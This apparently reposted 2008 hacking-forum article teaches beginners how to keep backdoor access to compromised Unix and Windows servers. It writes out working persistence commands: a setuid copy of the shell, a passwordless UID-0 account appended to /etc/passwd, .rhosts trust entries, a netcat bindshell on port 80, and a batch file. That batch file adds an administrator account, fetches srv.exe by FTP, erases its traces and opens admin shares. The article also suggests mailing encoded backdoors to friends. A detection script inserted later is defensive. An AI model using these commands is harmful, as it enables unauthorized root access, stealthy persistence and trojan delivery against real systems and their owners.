Common ways of leaving a backdoor - vulnerability warning - the black bar safety net

ID MYHACK58:62200818686
Type myhack58
Reporter Anonymous
Modified 2008-04-02T00:00:00


For a newbie like me, finally getting hold of a server is not easy, and it is miserable if the access gets discovered. There are actually many ways to open a backdoor; below I describe several that I have learned.

1. Setuid

cp /bin/sh /tmp/.root

chmod u+s /tmp/.root

Adding the suid bit to a copy of the shell is very simple, but it is also easily discovered.

2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd

This adds an account with UID 0 (that is, root) and no password to the system, but an administrator can find it with the find command.
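As an added defender-side check that is not part of the original article, the POSIX shell functions below look for the two artifacts that items 1 and 2 leave behind: an extra UID-0 or passwordless account in /etc/passwd, and a setuid file sitting in a scratch directory such as /tmp. The passwd file used for the demonstration is constructed here, not read from a real system.

```shell
#!/bin/sh
# Added detection helpers (not from the original article). They look for the
# two persistence artifacts described above: an extra UID-0 or passwordless
# account in /etc/passwd, and a setuid binary left in a scratch directory.

# Print every account with UID 0 other than root, one name per line.
# $1: passwd file to inspect (defaults to /etc/passwd).
uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Print every account whose password field is completely empty.
# Accounts that use shadow passwords carry "x" or "*" here and are skipped.
nopasswd_accounts() {
    awk -F: '$2 == "" { print $1 }' "${1:-/etc/passwd}"
}

# Print setuid regular files under the given directories (default: /tmp).
# Dotfile names such as /tmp/.root are matched too; find does not skip them.
setuid_files() {
    [ $# -gt 0 ] || set -- /tmp
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -xdev -type f -perm -4000 2>/dev/null || true
    done
}

# Constructed sample passwd file that contains the line the article appends.
sample_passwd() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hack::0:0::/:/bin/csh
EOF
    printf '%s\n' "$f"
}

# Stand-alone demonstration on the constructed file, then a scan of /tmp.
pw=$(sample_passwd)
printf 'UID 0 accounts besides root: %s\n' "$(uid0_accounts "$pw")"
printf 'Accounts with an empty password: %s\n' "$(nopasswd_accounts "$pw")"
rm -f "$pw"
setuid_files /tmp /var/tmp
```

On a real host, point uid0_accounts and nopasswd_accounts at /etc/passwd and compare the setuid_files output with the package manager's list of known setuid binaries.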

3. echo "hack" >> /.rhosts

If the system has ports 512 and 513 open, you can add a user called hack to the .rhosts file and then rlogin without a password.

4. Modify the sendmail.cf file

Add a "wiz" command, then telnet to port 25 and issue wiz, after which you are in.

5. Rootkits

These are pretty hot right now, but be careful about small details such as file dates. Some need to be compiled by yourself; others come precompiled.

6. Remote shell

Sunx's backdoor is very good: it produces no log entries and hides from who and similar tools. It needs to be compiled, but it runs very well on Red Hat 6.1. On 7.1 and other versions it seems to have a small bug.

Alternatively you can use a bindshell, replacing a rarely used service in inetd.conf; mind the file modification time.

7. HTTP backdoor

In fact, firewalls generally place fewer restrictions on the web service, so we can start from there; port redirection is needed. Simply put, the web server runs two HTTP services: one is HTTP itself, the other is the remote shell bindshell. If the firewall filters every other port and forbids reverse connections, the simple approach is nc (netcat): bind cmd.exe to port 80, then telnet to port 80 and you get a shell. Or you can write a backdoor in asp, php, cgi or other code, which achieves the same effect.

8. Bat backdoor (original)

If it is a *nix server, there is no way to do this.

MS server:

backdoor.bat

net user hacker windychild /add

net localgroup administrators hacker /add

rem the two lines above create the super admin user

echo open>c:\ftp.txt

echo xxx>>c:\ftp.txt

echo xxxxxx>>c:\ftp.txt

echo get srv.exe>>c:\ftp.txt

echo bye>>c:\ftp.txt


copy srv.exe c:\winnt\


del c:\ftp.txt

del c:\srv.exe

...... You can set up your own Trojan horse or backdoor here, etc.

.... Or you can add statements that open the 3389 service or telnet.

Also, open up shares!

net share ipc=ipc$

net share hdc=c$


If you want to be thorough, simply finish by giving it a rootkit for Windows.

9. You can use the mail encoding vulnerability

Send your friend a base64-encoded file, converting the backdoor .exe into the message encoding.

In fact, the methods above are all very common. There are many more, and sometimes they are hard to sort out, but this is enough for beginners!